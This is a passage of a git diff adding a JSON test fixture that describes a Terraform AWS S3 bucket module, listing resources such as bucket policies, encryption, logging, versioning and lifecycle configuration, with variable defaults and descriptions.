"for_each_expression": { + "references": [ + "local.intelligent_tiering", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_inventory.this", + "mode": "managed", + "type": "aws_s3_bucket_inventory", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "each.value.bucket", + "each.value", + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + 
"destination": [ + { + "bucket": [ + { + "account_id": { + "references": [ + "each.value.destination.account_id", + "each.value.destination", + "each.value" + ] + }, + "bucket_arn": { + "references": [ + "each.value.destination.bucket_arn", + "each.value.destination", + "each.value", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "format": { + "references": [ + "each.value.destination.format", + "each.value.destination", + "each.value" + ] + }, + "prefix": { + "references": [ + "each.value.destination.prefix", + "each.value.destination", + "each.value" + ] + } + } + ] + } + ], + "enabled": { + "references": [ + "each.value.enabled", + "each.value" + ] + }, + "included_object_versions": { + "references": [ + "each.value.included_object_versions", + "each.value" + ] + }, + "name": { + "references": [ + "each.key" + ] + }, + "optional_fields": { + "references": [ + "each.value.optional_fields", + "each.value" + ] + }, + "schedule": [ + { + "frequency": { + "references": [ + "each.value.frequency", + "each.value" + ] + } + } + ] + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.inventory_configuration", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_lifecycle_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_lifecycle_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.lifecycle_rules" + ] + }, + "depends_on": [ + "aws_s3_bucket_versioning.this" + ] + }, + { + "address": "aws_s3_bucket_logging.this", + "mode": "managed", + "type": "aws_s3_bucket_logging", + "name": "this", + "provider_config_key": 
"s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "target_bucket": { + "references": [ + "var.logging[\"target_bucket\"]", + "var.logging" + ] + }, + "target_prefix": { + "references": [ + "var.logging[\"target_prefix\"]", + "var.logging" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.logging" + ] + } + }, + { + "address": "aws_s3_bucket_metric.this", + "mode": "managed", + "type": "aws_s3_bucket_metric", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "name": { + "references": [ + "each.value.name", + "each.value" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "local.metric_configuration", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_object_lock_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_object_lock_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "rule": [ + { + "default_retention": [ + { + "days": { + "references": [ + "var.object_lock_configuration.rule.default_retention.days", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + }, + "mode": { + "references": [ + "var.object_lock_configuration.rule.default_retention.mode", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + }, + "years": { + "references": [ + 
"var.object_lock_configuration.rule.default_retention.years", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + } + } + ] + } + ], + "token": { + "references": [ + "var.object_lock_configuration.token", + "var.object_lock_configuration" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.object_lock_enabled", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + } + }, + { + "address": "aws_s3_bucket_ownership_controls.this", + "mode": "managed", + "type": "aws_s3_bucket_ownership_controls", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "local.attach_policy", + "aws_s3_bucket_policy.this[0].id", + "aws_s3_bucket_policy.this[0]", + "aws_s3_bucket_policy.this", + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "rule": [ + { + "object_ownership": { + "references": [ + "var.object_ownership" + ] + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.control_object_ownership" + ] + }, + "depends_on": [ + "aws_s3_bucket_policy.this", + "aws_s3_bucket_public_access_block.this", + "aws_s3_bucket.this" + ] + }, + { + "address": "aws_s3_bucket_policy.this", + "mode": "managed", + "type": "aws_s3_bucket_policy", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "policy": { + "references": [ + "data.aws_iam_policy_document.combined[0].json", + "data.aws_iam_policy_document.combined[0]", + "data.aws_iam_policy_document.combined" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + 
"local.attach_policy" + ] + }, + "depends_on": [ + "aws_s3_bucket_public_access_block.this" + ] + }, + { + "address": "aws_s3_bucket_public_access_block.this", + "mode": "managed", + "type": "aws_s3_bucket_public_access_block", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "block_public_acls": { + "references": [ + "var.block_public_acls" + ] + }, + "block_public_policy": { + "references": [ + "var.block_public_policy" + ] + }, + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "ignore_public_acls": { + "references": [ + "var.ignore_public_acls" + ] + }, + "restrict_public_buckets": { + "references": [ + "var.restrict_public_buckets" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_public_policy" + ] + } + }, + { + "address": "aws_s3_bucket_replication_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_replication_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "role": { + "references": [ + "var.replication_configuration[\"role\"]", + "var.replication_configuration" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.replication_configuration" + ] + }, + "depends_on": [ + "aws_s3_bucket_versioning.this" + ] + }, + { + "address": "aws_s3_bucket_request_payment_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_request_payment_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "payer": 
{ + "references": [ + "var.request_payer" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.request_payer" + ] + } + }, + { + "address": "aws_s3_bucket_server_side_encryption_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_server_side_encryption_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.server_side_encryption_configuration" + ] + } + }, + { + "address": "aws_s3_bucket_versioning.this", + "mode": "managed", + "type": "aws_s3_bucket_versioning", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "mfa": { + "references": [ + "var.versioning[\"mfa\"]", + "var.versioning" + ] + }, + "versioning_configuration": [ + { + "mfa_delete": { + "references": [ + "var.versioning[\"mfa_delete\"]", + "var.versioning", + "var.versioning[\"mfa_delete\"]", + "var.versioning" + ] + }, + "status": { + "references": [ + "var.versioning[\"enabled\"]", + "var.versioning", + "var.versioning[\"status\"]", + "var.versioning", + "var.versioning[\"status\"]", + "var.versioning" + ] + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.versioning" + ] + } + }, + { + "address": "aws_s3_bucket_website_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_website_configuration", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { 
+ "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.website" + ] + } + }, + { + "address": "data.aws_caller_identity.current", + "mode": "data", + "type": "aws_caller_identity", + "name": "current", + "provider_config_key": "s3-bucket-2:aws", + "schema_version": 0 + }, + { + "address": "data.aws_canonical_user_id.this", + "mode": "data", + "type": "aws_canonical_user_id", + "name": "this", + "provider_config_key": "s3-bucket-2:aws", + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.create_bucket_acl", + "var.owner[\"id\"]", + "var.owner" + ] + } + }, + { + "address": "data.aws_iam_policy_document.access_log_delivery", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "access_log_delivery", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "logging.s3.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSAccessLogDeliveryWrite" + } + }, + { + "actions": { + "constant_value": [ + "s3:GetBucketAcl" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "logging.s3.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": 
"AWSAccessLogDeliveryAclCheck" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_access_log_delivery_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.combined", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "combined", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "source_policy_documents": { + "references": [ + "var.attach_elb_log_delivery_policy", + "data.aws_iam_policy_document.elb_log_delivery[0].json", + "data.aws_iam_policy_document.elb_log_delivery[0]", + "data.aws_iam_policy_document.elb_log_delivery", + "var.attach_lb_log_delivery_policy", + "data.aws_iam_policy_document.lb_log_delivery[0].json", + "data.aws_iam_policy_document.lb_log_delivery[0]", + "data.aws_iam_policy_document.lb_log_delivery", + "var.attach_access_log_delivery_policy", + "data.aws_iam_policy_document.access_log_delivery[0].json", + "data.aws_iam_policy_document.access_log_delivery[0]", + "data.aws_iam_policy_document.access_log_delivery", + "var.attach_require_latest_tls_policy", + "data.aws_iam_policy_document.require_latest_tls[0].json", + "data.aws_iam_policy_document.require_latest_tls[0]", + "data.aws_iam_policy_document.require_latest_tls", + "var.attach_deny_insecure_transport_policy", + "data.aws_iam_policy_document.deny_insecure_transport[0].json", + "data.aws_iam_policy_document.deny_insecure_transport[0]", + "data.aws_iam_policy_document.deny_insecure_transport", + "var.attach_deny_unencrypted_object_uploads", + "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0].json", + "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0]", + "data.aws_iam_policy_document.deny_unencrypted_object_uploads", + "var.attach_deny_incorrect_kms_key_sse", + "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0].json", + "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0]", + "data.aws_iam_policy_document.deny_incorrect_kms_key_sse", + 
"var.attach_deny_incorrect_encryption_headers", + "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0].json", + "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0]", + "data.aws_iam_policy_document.deny_incorrect_encryption_headers", + "var.attach_inventory_destination_policy", + "var.attach_analytics_destination_policy", + "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0].json", + "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0]", + "data.aws_iam_policy_document.inventory_and_analytics_destination_policy", + "var.attach_policy", + "var.policy" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.attach_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_incorrect_encryption_headers", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_incorrect_encryption_headers", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringNotEquals" + }, + "values": { + "references": [ + "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default.sse_algorithm", + "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default", + "var.server_side_encryption_configuration.rule", + "var.server_side_encryption_configuration" + ] + }, + "variable": { + "constant_value": "s3:x-amz-server-side-encryption" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyIncorrectEncryptionHeaders" + } + } + ] + }, + "schema_version": 0, 
+ "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_incorrect_encryption_headers" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_incorrect_kms_key_sse", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_incorrect_kms_key_sse", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringNotEquals" + }, + "values": { + "references": [ + "var.allowed_kms_key_arn" + ] + }, + "variable": { + "constant_value": "s3:x-amz-server-side-encryption-aws-kms-key-id" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyIncorrectKmsKeySse" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_incorrect_kms_key_sse" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_insecure_transport", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_insecure_transport", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:*" + ] + }, + "condition": [ + { + "test": { + "constant_value": "Bool" + }, + "values": { + "constant_value": [ + "false" + ] + }, + "variable": { + "constant_value": "aws:SecureTransport" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + 
"aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyInsecureTransport" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_insecure_transport_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_unencrypted_object_uploads", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_unencrypted_object_uploads", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "Null" + }, + "values": { + "constant_value": [ + true + ] + }, + "variable": { + "constant_value": "s3:x-amz-server-side-encryption" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyUnencryptedObjectUploads" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_unencrypted_object_uploads" + ] + } + }, + { + "address": "data.aws_iam_policy_document.elb_log_delivery", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "elb_log_delivery", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "logdelivery.elasticloadbalancing.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + 
"aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_elb_log_delivery_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.inventory_and_analytics_destination_policy", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "inventory_and_analytics_destination_policy", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "ArnLike" + }, + "values": { + "references": [ + "var.inventory_self_source_destination", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + "var.inventory_source_bucket_arn", + "var.analytics_self_source_destination", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + "var.analytics_source_bucket_arn" + ] + }, + "variable": { + "constant_value": "aws:SourceArn" + } + }, + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "references": [ + "var.inventory_self_source_destination", + "data.aws_caller_identity.current.id", + "data.aws_caller_identity.current", + "var.inventory_source_account_id", + "var.analytics_self_source_destination", + "data.aws_caller_identity.current.id", + "data.aws_caller_identity.current", + "var.analytics_source_account_id" + ] + }, + "variable": { + "constant_value": "aws:SourceAccount" + } + }, + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "constant_value": [ + "bucket-owner-full-control" + ] + }, + "variable": { + "constant_value": "s3:x-amz-acl" + } + } + ], + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "s3.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + 
"aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "destinationInventoryAndAnalyticsPolicy" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_inventory_destination_policy", + "var.attach_analytics_destination_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.lb_log_delivery", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "lb_log_delivery", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringEquals" + }, + "values": { + "constant_value": [ + "bucket-owner-full-control" + ] + }, + "variable": { + "constant_value": "s3:x-amz-acl" + } + } + ], + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "delivery.logs.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSLogDeliveryWrite" + } + }, + { + "actions": { + "constant_value": [ + "s3:GetBucketAcl", + "s3:ListBucket" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "delivery.logs.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSLogDeliveryAclCheck" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_lb_log_delivery_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.require_latest_tls", + "mode": "data", + "type": 
"aws_iam_policy_document", + "name": "require_latest_tls", + "provider_config_key": "s3-bucket-2:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:*" + ] + }, + "condition": [ + { + "test": { + "constant_value": "NumericLessThan" + }, + "values": { + "constant_value": [ + "1.2" + ] + }, + "variable": { + "constant_value": "s3:TlsVersion" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyOutdatedTLS" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_require_latest_tls_policy" + ] + } + }, + { + "address": "data.aws_partition.current", + "mode": "data", + "type": "aws_partition", + "name": "current", + "provider_config_key": "s3-bucket-2:aws", + "schema_version": 0 + }, + { + "address": "data.aws_region.current", + "mode": "data", + "type": "aws_region", + "name": "current", + "provider_config_key": "s3-bucket-2:aws", + "schema_version": 0 + } + ], + "variables": { + "acceleration_status": { + "default": null, + "description": "(Optional) Sets the accelerate configuration of an existing bucket. Can be Enabled or Suspended." + }, + "access_log_delivery_policy_source_accounts": { + "default": [], + "description": "(Optional) List of AWS Account IDs should be allowed to deliver access logs to this bucket." + }, + "access_log_delivery_policy_source_buckets": { + "default": [], + "description": "(Optional) List of S3 bucket ARNs wich should be allowed to deliver access logs to this bucket." + }, + "acl": { + "default": null, + "description": "(Optional) The canned ACL to apply. 
Conflicts with `grant`" + }, + "allowed_kms_key_arn": { + "default": null, + "description": "The ARN of KMS key which should be allowed in PutObject" + }, + "analytics_configuration": { + "default": {}, + "description": "Map containing bucket analytics configuration." + }, + "analytics_self_source_destination": { + "default": false, + "description": "Whether or not the analytics source bucket is also the destination bucket." + }, + "analytics_source_account_id": { + "default": null, + "description": "The analytics source account id." + }, + "analytics_source_bucket_arn": { + "default": null, + "description": "The analytics source bucket ARN." + }, + "attach_access_log_delivery_policy": { + "default": false, + "description": "Controls if S3 bucket should have S3 access log delivery policy attached" + }, + "attach_analytics_destination_policy": { + "default": false, + "description": "Controls if S3 bucket should have bucket analytics destination policy attached." + }, + "attach_deny_incorrect_encryption_headers": { + "default": false, + "description": "Controls if S3 bucket should deny incorrect encryption headers policy attached." + }, + "attach_deny_incorrect_kms_key_sse": { + "default": false, + "description": "Controls if S3 bucket policy should deny usage of incorrect KMS key SSE." + }, + "attach_deny_insecure_transport_policy": { + "default": false, + "description": "Controls if S3 bucket should have deny non-SSL transport policy attached" + }, + "attach_deny_unencrypted_object_uploads": { + "default": false, + "description": "Controls if S3 bucket should deny unencrypted object uploads policy attached." + }, + "attach_elb_log_delivery_policy": { + "default": false, + "description": "Controls if S3 bucket should have ELB log delivery policy attached" + }, + "attach_inventory_destination_policy": { + "default": false, + "description": "Controls if S3 bucket should have bucket inventory destination policy attached." 
+ }, + "attach_lb_log_delivery_policy": { + "default": false, + "description": "Controls if S3 bucket should have ALB/NLB log delivery policy attached" + }, + "attach_policy": { + "default": false, + "description": "Controls if S3 bucket should have bucket policy attached (set to `true` to use value of `policy` as bucket policy)" + }, + "attach_public_policy": { + "default": true, + "description": "Controls if a user defined public bucket policy will be attached (set to `false` to allow upstream to apply defaults to the bucket)" + }, + "attach_require_latest_tls_policy": { + "default": false, + "description": "Controls if S3 bucket should require the latest version of TLS" + }, + "block_public_acls": { + "default": true, + "description": "Whether Amazon S3 should block public ACLs for this bucket." + }, + "block_public_policy": { + "default": true, + "description": "Whether Amazon S3 should block public bucket policies for this bucket." + }, + "bucket": { + "default": null, + "description": "(Optional, Forces new resource) The name of the bucket. If omitted, Terraform will assign a random, unique name." + }, + "bucket_prefix": { + "default": null, + "description": "(Optional, Forces new resource) Creates a unique bucket name beginning with the specified prefix. Conflicts with bucket." + }, + "control_object_ownership": { + "default": false, + "description": "Whether to manage S3 Bucket Ownership Controls on this bucket." + }, + "cors_rule": { + "default": [], + "description": "List of maps containing rules for Cross-Origin Resource Sharing." 
+ }, + "create_bucket": { + "default": true, + "description": "Controls if S3 bucket should be created" + }, + "expected_bucket_owner": { + "default": null, + "description": "The account ID of the expected bucket owner" + }, + "force_destroy": { + "default": false, + "description": "(Optional, Default:false ) A boolean that indicates all objects should be deleted from the bucket so that the bucket can be destroyed without error. These objects are not recoverable." + }, + "grant": { + "default": [], + "description": "An ACL policy grant. Conflicts with `acl`" + }, + "ignore_public_acls": { + "default": true, + "description": "Whether Amazon S3 should ignore public ACLs for this bucket." + }, + "intelligent_tiering": { + "default": {}, + "description": "Map containing intelligent tiering configuration." + }, + "inventory_configuration": { + "default": {}, + "description": "Map containing S3 inventory configuration." + }, + "inventory_self_source_destination": { + "default": false, + "description": "Whether or not the inventory source bucket is also the destination bucket." + }, + "inventory_source_account_id": { + "default": null, + "description": "The inventory source account id." + }, + "inventory_source_bucket_arn": { + "default": null, + "description": "The inventory source bucket ARN." + }, + "lifecycle_rule": { + "default": [], + "description": "List of maps containing configuration of object lifecycle management." + }, + "logging": { + "default": {}, + "description": "Map containing access bucket logging configuration." + }, + "metric_configuration": { + "default": [], + "description": "Map containing bucket metric configuration." + }, + "object_lock_configuration": { + "default": {}, + "description": "Map containing S3 object locking configuration." + }, + "object_lock_enabled": { + "default": false, + "description": "Whether S3 bucket should have an Object Lock configuration enabled." 
+ }, + "object_ownership": { + "default": "BucketOwnerEnforced", + "description": "Object ownership. Valid values: BucketOwnerEnforced, BucketOwnerPreferred or ObjectWriter. 'BucketOwnerEnforced': ACLs are disabled, and the bucket owner automatically owns and has full control over every object in the bucket. 'BucketOwnerPreferred': Objects uploaded to the bucket change ownership to the bucket owner if the objects are uploaded with the bucket-owner-full-control canned ACL. 'ObjectWriter': The uploading account will own the object if the object is uploaded with the bucket-owner-full-control canned ACL." + }, + "owner": { + "default": {}, + "description": "Bucket owner's display name and ID. Conflicts with `acl`" + }, + "policy": { + "default": null, + "description": "(Optional) A valid bucket policy JSON document. Note that if the policy document is not specific enough (but still valid), Terraform may view the policy as constantly changing in a terraform plan. In this case, please make sure you use the verbose/specific version of the policy. For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide." + }, + "replication_configuration": { + "default": {}, + "description": "Map containing cross-region replication configuration." + }, + "request_payer": { + "default": null, + "description": "(Optional) Specifies who should bear the cost of Amazon S3 data transfer. Can be either BucketOwner or Requester. By default, the owner of the S3 bucket would incur the costs of any data transfer. See Requester Pays Buckets developer guide for more information." + }, + "restrict_public_buckets": { + "default": true, + "description": "Whether Amazon S3 should restrict public bucket policies for this bucket." + }, + "server_side_encryption_configuration": { + "default": {}, + "description": "Map containing server-side encryption configuration." 
+ },
+ "tags": {
+ "default": {},
+ "description": "(Optional) A mapping of tags to assign to the bucket."
+ },
+ "versioning": {
+ "default": {},
+ "description": "Map containing versioning configuration."
+ },
+ "website": {
+ "default": {},
+ "description": "Map containing static web-site hosting or redirect configuration."
+ }
+ }
+ },
+ "version_constraint": "4.0.1"
+ }
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json b/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json
index e8735ca7d20..6aef536a90b 100644
--- a/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json
+++ b/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json
@@ -3,6 +3,7 @@
